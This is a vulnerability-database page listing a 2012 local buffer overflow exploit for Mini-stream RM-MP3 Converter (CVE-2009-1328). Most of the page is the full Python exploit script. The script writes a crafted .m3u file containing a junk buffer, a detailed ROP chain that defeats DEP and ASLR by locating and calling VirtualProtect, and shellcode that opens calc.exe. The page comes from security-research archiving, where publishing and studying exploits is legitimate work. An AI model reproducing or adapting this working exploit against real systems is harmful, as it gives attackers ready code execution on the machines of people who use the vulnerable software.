Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mini-Stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow

🗓️ 26 Jul 2012 00:00:00Reported by Gianni GnesaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 39 Views

Mini-Stream RM-MP3 Converter local buffer overflow exploit for Windows 7 SP

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow (ASLR and DEP Bypass)
27 Jul 201200:00
zdt
Circl		CVE-2009-1328
13 Apr 200900:00
circl
CVE		CVE-2009-1328
17 Apr 200910:00
cve
Cvelist		CVE-2009-1328
17 Apr 200910:00
cvelist
Exploit DB		Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Local Buffer Overflow (ASLR + DEP Bypass)
27 Jul 201200:00
exploitdb
exploitpack		Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Local Buffer Overflow (ASLR + DEP Bypass)
27 Jul 201200:00
exploitpack
NVD		CVE-2009-1328
17 Apr 200914:08
nvd
OpenVAS		Mini-Stream Multiple Products Buffer Overflow Vulnerability
30 Apr 200900:00
openvas
OpenVAS		Mini-Stream Multiple Products Buffer Overflow Vulnerability
30 Apr 200900:00
openvas
Prion		Stack overflow
17 Apr 200914:08
prion
Rows per page
`# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 local buffer overflow (\w ASLR and DEP bypass)  
# Date: 26 July 2012  
# Exploit Author: Gianni Gnesa  
# Vendor Homepage: http://mini-stream.net/  
# Software Link: http://mini-stream.net/rm-to-mp3-converter/download  
# Version: 3.1.2.1.2010.03.30  
# Tested on: Windows 7 SP1 (VMware)  
# References: CVE-2009-1328, BID 34494  
  
from struct import pack  
  
fname = "rop.m3u"  
hdr = "http://."  
junk1 = "A" * 17416 # junk  
  
rop = [  
0x10041720, # RETN [MSRMfilter03.dll]  
0x41414141, # Compensate  
  
  
#### Save ESP into ESI  
# EAX=EBP  
0x1001a503, # XOR EAX,EAX / RETN [MSRMfilter03.dll]  
0x10051ff5, # ADD EAX,EBP / RETN [MSRMfilter03.dll]  
  
# ESI=EAX  
0x1005bb8e, # PUSH EAX / ADD DWORD PTR SS:[EBP+5],ESI / PUSH 1 / POP EAX / POP ESI / RETN [MSRMfilter03.dll]  
  
# EBX=ESI  
0x1001217b, # PUSH ESI / ADD AL,5E / POP EBX / RETN [MSRMfilter03.dll]  
  
# EDX=EBX  
0x1002991c, # XOR EDX,EDX / RETN [MSRMfilter03.dll]  
0x10029f3e, # ADD EDX,EBX / POP EBX / RETN 10 [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBX  
  
# ESI=ESP  
0x10032D54, # PUSH ESP / AND AL,10 / POP ESI / MOV DWORD PTR DS:[EDX],ECX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for RETN  
0x41414141, # Junk for RETN  
0x41414141, # Junk for RETN  
0x41414141, # Junk for RETN  
  
  
#### Jump over VirtualProtect()  
0x100237C8, # ADD ESP, 20 / RETN [MSRMfilter03.dll]  
  
0x58585858, # VirtualProtect()  
0x58585858, # Return Address  
0x58585858, # lpAddress  
0x58585858, # dwSize  
0x58585858, # flNewProtect  
0x10085515, # lpflOldProtect [Address in MSRMfilter03.dll]  
  
0x90909090, # Padding  
0x90909090, # Padding  
# ADD ESP,20 / RETN will land here  
  
  
#### Find kernel32.VirtualProtect  
# Save ESI (Saved ESP) into EBX  
0x1001217b, # PUSH ESI / ADD AL,5E / POP EBX / RETN [MSRMfilter03.dll]  
  
# EAX = Saved ESP - 0xACE4  
0x1002ca2d, # POP EAX / RETN [MSRMfilter03.dll]  
0xFFFF531C, # -0xACE4 (offset from the Saved ESP to the kernel32.XXXXBBE4 in the stack)  
0x10033bbb, # ADD EAX,ESI / POP ESI / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in ESI  
  
# Pickup kernel32.XXXXBBE4 into EAX  
0x10027f59, # MOV EAX,DWORD PTR DS:[EAX] / RETN [MSRMfilter03.dll]  
  
# Find kernel32.VirtualProtect  
0x1001263D, # POP ECX / RETN [MSRMfilter03.dll]  
0xFFFF675D, # -0x98A3 (offset from kernel32.XXXXBBE4 to kernel32.VirtualProtect)  
0x1001451e, # ADD EAX,ECX / RETN [MSRMfilter03.dll]  
  
  
##### Write VirtualProtect address to memory  
# EDX = EBX = Saved ESP  
0x1002993c, # XOR EDX,EDX / RETN [MSRMfilter03.dll]  
0x10029f3e, # ADD EDX,EBX / POP EBX / RETN 10 [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBX  
  
# EDX = EDX + 4  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for RETN  
0x41414141, # Junk for RETN  
0x41414141, # Junk for RETN  
0x41414141, # Junk for RETN  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
  
# Write VirtualProtect address to memory  
0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]  
  
  
#### Write return address to memory  
# EAX = EDX (Saved ESP) + 0x300  
0x1002fa6a, # MOV EAX,EDX / RETN [MSRMfilter03.dll]  
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBP  
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBP  
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBP  
  
# EDX = EDX + 4  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
  
# Write return address to memory  
0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]  
  
  
#### Write lpAddress parameter to memory  
# EAX = EDX (Saved ESP) + 0x300  
0x1002fa6a, # MOV EAX,EDX / RETN [MSRMfilter03.dll]  
0x1001263D, # POP ECX / RETN [MSRMfilter03.dll]  
0xFFFFFFFC, # -0x4 (compensate EDX increment)  
0x1001451e, # ADD EAX,ECX / RETN [MSRMfilter03.dll]  
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBP  
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBP  
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBP  
  
# EDX = EDX + 4  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
  
# Write lpAddress parameter to memory  
0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]  
  
  
#### Write dwSize parameter to memory  
# EAX = 0x400  
0x1001a503, # XOR EAX,EAX / RETN [MSRMfilter03.dll]  
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBP  
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBP  
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBP  
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBP  
  
# EDX = EDX + 4  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
  
# Write dwSize parameter to memory  
0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]  
  
  
#### Write flNewProtect parameter to memory  
# EAX = 0x40  
0x1001a503, # XOR EAX,EAX / RETN [MSRMfilter03.dll]  
0x10031c81, # ADD EAX,40 # POP EBP / RETN [MSRMfilter03.dll]  
0x41414141, # Junk popped in EBP  
  
# EDX = EDX + 4  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]  
0x41414141, # Junk for ESI  
0x41414141, # Junk for EDI  
0x41414141, # Junk for EBX  
  
# Write flNewProtect parameter to memory  
0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]  
  
  
#### Call VirtualProtect  
0x1002fa6a, # MOV EAX,EDX / RETN [MSRMfilter03.dll]  
0x1001263D, # POP ECX / RETN [MSRMfilter03.dll]  
0xFFFFFFF0, # -0x10 (Move EDX back to the VirtualProtect call)  
0x1001451e, # ADD EAX,ECX / RETN [MSRMfilter03.dll]  
0x1002fe81, # XCHG EAX,ESP / RETN [MSRMfilter03.dll]  
]  
  
nops = "\x90" * 240  
  
# calc.exe payload  
shellcode = (  
"\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52"  
"\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E"  
"\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C"  
"\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF5\x0F"  
"\xB7\x54\x51\xFE\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7"  
)  
  
  
print "Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30"  
print "Local buffer overflow (\w ASLR and DEP bypass)\n"  
  
payload = hdr + junk1 + pack('<'+str(len(rop))+'L',*rop) + nops + shellcode  
  
f = open(fname, "w")  
f.write(payload)  
f.close()  
  
print "%s file created!" % fname  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jul 2012 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.28244
exploitbuffer overflowwindows 7mini-stream rm-mp3 converteraslrdepcve-2009-1328bid 34494vmware
39